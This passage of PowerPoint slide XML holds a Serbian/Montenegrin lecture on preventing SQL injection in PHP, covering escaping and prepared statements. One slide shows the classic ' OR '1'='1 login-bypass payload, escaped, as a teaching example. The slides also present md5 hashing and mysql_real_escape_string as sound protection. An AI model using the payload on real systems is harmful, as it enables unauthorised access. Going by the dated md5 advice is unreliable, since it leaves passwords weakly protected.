              <a:t>većinu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>problema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obavezna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stavka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije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Ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>filtrirali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisniku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zabranimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>specijalnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karaktera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>specifičnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> primer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>apostrofe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>lozinke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>možemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koristimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednosmerne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>enkripcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> primer md5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>povećali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.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Međutim,postoje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druge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sprečavanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dozvolimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karaktere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Pripremljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="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70973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6CA20-F8F0-4CFB-BE1B-FB8D07E97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mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()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189DC-D84F-414B-8A06-CE49894D5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295400"/>
            <a:ext cx="7194550" cy="48466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/>
              <a:t>Ova </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajveru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>poseduje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mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>)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osigurava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>će</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>specijalni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakteri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>biti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pravilno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>eskejpovani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>građenju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita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dalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ponašaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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sastavni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> tog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stringa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nikako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>iskoriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izmjeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita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/>
              <a:t>Ova </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je “best practice” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> mora se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>promenjivima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grade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r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Upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za gore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>navedeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> primer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nakon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>eskejpovanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>promenjivih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izgleda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r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b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zaštićen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je od SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napada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endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p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2728B0-59DA-4FE8-B699-5D00AB96F8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733800"/>
            <a:ext cx="8839200" cy="4225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$username =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mysql_real_escape_string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($_POST['username']);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7DBFEB-7EF2-45B7-83F5-A2C904DD0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976018"/>
            <a:ext cx="8839200" cy="891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SELECT * FROM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korisnici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WHERE username = 'a\' OR \'1\'=\'1' AND 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    password = 'a\' OR \'1\'=\'1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24874978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CC086-8F3E-40AD-9CC5-2A48CBB38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Pripremljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Prepared statements)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7CF73-0344-433B-8ED7-52B2C4E5A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Pripremljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nijesu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tolika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>velika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>novost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mnogi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>programeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>početnici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izbjegavaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.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Vjerovatno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zbog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slabog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razumijevanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>načina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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rade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Prije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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napomenuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pripremljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izrazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>starim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>verzijama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajvera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>standaradni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mysql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Takoreći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drajver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>starijeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>datuma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njegov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dalji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razvoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odavno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>obustavljen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Čak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je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preporuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>konzorcijuma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da se on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>potpuno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izbaci</a:t>
            </a:r>
            <a:r>
